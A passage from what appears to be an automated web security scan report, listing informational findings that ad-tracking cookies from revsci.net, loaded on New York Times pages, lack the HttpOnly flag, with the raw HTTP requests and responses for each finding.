rtc_ct15=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ct15=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNO0PF7nMYVY1Juswpg79QalFC5KCa4WX08GFNFNHV+Jbjo+n86Xli3TAlZ7sPSls+pOPn4ipzRWXtum8RaOGY6IdTfa6uoM2RcyTMRJCBbs3UiF3/XgTzeleJ3tyv0bfJW7avQEA1cAleJYg/jUnqp62rgNlrlHK8V4f2GxmXbnF6FwzLOQutobAqsf/spstzXxlFG6ck3Qo5/sFCwjE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
Set-Cookie: rtc_0tQm=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+Enr//DyFLu1LNxozaNrNCnxTv/CPBK4vwUC37I+Pw2DxDH9eVMUC9zB1mGK9JGee2kZ/rkxh9ZhsvGXmyp1GIOejNCcp29JzcATN8GDRgxtWQLVIrfqXjLYkKxH2Wkot1CcCcHEV+imu9mtVtV+fEsoPqb8Sx0EexVQw7FtCen+/ihLI/zuRtzoISDJn1i335fn+91HWdFyleqRqt2FFYHQRSR0n0huHL1bBQL7IuGA/Tq/HBv4FOro1WSc6yqw+2xjgQcQAAMVLamZ29iRGSHkD6u/g3+COdPKCAvGf4n; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:47 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:47 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

14.115. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/71896167.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/71896167.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; 
udm_0=MLvv9CEJZjpv597JwPIRxS7gdG4nwPCqf6GGn7aMZB+wNajXBF+Nd1a01tm80x2HLZXYXYhFrnW54ugjciqgGm0tFOfpQeajGmdmQRYo7iifhXcq3Wbs+0M+s7Er2k8tdZWVCBvtko5Zjp8Cj5v2E8ykI+gHIp9/hRPdDeYJcxcbADkCInkuWb3Npj5APREYj/xsHpSZBntv8EoAPRzrJrHWs2DOkRntedZLjOdhyHvTXN5pS4V7upcIjIuq2z7/nsdjrAMbyqK4kakCxviNxTGNlMARgyVMGXMgEZ2MLmd9Zbk6kIOT4fYg/J9/u3Chb6WYqZH/gV9G+oqdCe0W2L6aw0qpg1Y3BGqAUEvNq0wvrdVS7MvhTer7OYchsu6sTh/u9Gx6BNO3snaQim+a62aktgfQiAKgkbpSF0g6cYHhhiyEFKwRC3npVrJ8/n2a2ovJdrav5tzyZWxscutuDcLLKfMWG1aDzsJbjDhFz2ddOIynfvJZctFB3b642LkOMBqRzuhpRVS0fgTcqmLx1keW2dFZvbqqC46u+lqciRYAyQyep75BilOD63Cj5ePrU2dYqoElDy1Q1zuhixxdNaYw9GYvIHwZqfDGLhllmm6jaYnrUSeU99lAYeebrrwB0w6Ss8l6yO8a3fMhnvkEhGRAc4dRmSBXIglruiT3OQ2Sy2583rqhTZEKzHPTgqj+vWqN/4sa/d7YtbZAPV7ZMr01URBWAwka6PgCHcBRUt5tvpqMxBw3J5v8cflNbQMJTZqakbw/kZnwNRNyDgpVxP5WWW8hyAESrsHJF6BoiekbZ+a17IqqEtet6Ps3M3KVki7DJtb4R8rt2+XcLazxCdO977gYFd3hKll5dpzZ93z4Z6NosW5/fSxPmw0enLLbCda7zg0Vqrdnw1uXgPkuiNsn5D8PQ92/UW2lFCIvX2kUBiaRsXjgjbttbky196hNLztjQJdAKEkJmoD9Po1VF/Q2z+kAkXPcJgQAJrfPqO/AqKJA6hLL/IaTIL9asqXLCkO8JzvGwzbmLuFdzlqjdXBEQBJruGD750oA4VbPahg2RF3BbsBBfKOU1w3x64Y0JY/AcLuk6374bkWMKsbigZmqBmjxn34pzoiCsF4/QetnQHdIgvQUvl2RDSzSZGSXknTcaWtLYdMFf0snFL7u9LmBRlIadUGBur5qdwbM72e+34rOTffbJzWjRqH4m7UoKb3/bCiCwAygp71VgqahtO6s92x8FQLUppqTeUdLBVIASTHDpP32AiUEJiUZaAIl1/S0GPjsuBgV/YRFkUw+/7ngkZTEUqwOiy8Q+8bLyk6rct3FjNQEZcSLDuJoIyyzyhb4OVT4cYIqNqkLnRiL6vYqUStAMDKWCXoGRGFWbbnPgT89BL26vRV7EF5Zs47HQMdwcgfd5Ticg1NzMi6mmwQ0y9DrCkZh8Be4luXrF3JUgZbOxmeNU9kgCBKcZqkCH3y1JiU81vGbJ7FxRBbHB/pWIncUViSCYDZnySw=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4k+huXIQJ/AtY6gq+ml3T51epqLBQmL8IGbY2gQ4O3XYKvnesHJskvAjloepK631i+WEhUmrGkG9POIzi7inp/3S9t0/IkxBMjdPeK2r1xOnBR+A8KgmFzpR3pMg5V0STXRc5h/sA2NQ8SJlLg63pEKsg0LhGp0RYFkzNMODTshm1erra5gejvuagU2d8qI8ZLWb3uplY2tI/Vm/9cX9omRRy0syaq0l8Nr+TF6aZTxZx2CCsCqWg+0DKfxkTGPK39huZg4KIwOCJ80nGUjZBpf3916lDkUrfRsAPU8dNsvHJnE+CGrFmK78bzSClA2d7nO3mZ4Tph6/X622tft3S2FiJvxpnCmKKfsD6CkME6V/br58gGXWNbGm3Egg1d62rpTVHYS3zZbWSfXf8Ikbnyw3DeyLy9jQNNX1KUKbivSROVMa+hF+zKT/waoCZ19qAYNTw7Z+ayZxvx/C4L9+sRcCFeEUVtGn5W23UQsZvMZpRvHPHGvi9KVOgzOei7UTzuvUrprEbpNpWKZAHx16xSVr7Gozt/rKPxVU2WLffiZzsfplA/+QQ0toP9fGqoAZVtxFkZf9bzJss9X1eSlN87cHsirwXt8j2CcwfzhgrEDrrWcWYZrljcH4OYHTvMxCaLI3g0uL7gi4N0E/kHzsPvncOCO1GW/5Vsg2e3Fy05VDyEdlbQ/8Mjkt+5ydUkd34ajOZ7HY+1YDfruXt4sZqA5ORK8IDddeRnVVZseMKmQ0NBFR+3qCFM8NKuGE2u0N/NIm0RGB9tSW/FDeQHEg1dvu3CQQky0=; rtc_Uh1H=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Uh1H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
Set-Cookie: rtc_CFSh=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:16:13 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:16:13 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

14.116. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/747456476.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/747456476.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topics%252Fprivate-equity%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/private-equity/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=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; rtc_hiGv=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_hiGv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
Set-Cookie: rtc_xTlF=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:36:48 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_10678','H07707_11020','
...[SNIP]...

14.117. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/848419951.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/848419951.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F10%252Fapollo-to-buy-out-american-idol-owner%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="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"; 
rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=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; 
rtc_D9GE=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; rsi_segs_1000000=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; rtc_m6-a=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_D9GE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_m6-a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
Set-Cookie: rtc_cPyi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:40:34 GMT
Content-Length: 1389

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','H07707_10872','D08734_72078','H07707_10950','H07707_10954','H07707_10987','
...[SNIP]...

14.118. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/912026619.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/912026619.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=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; rtc_eanp=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_eanp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
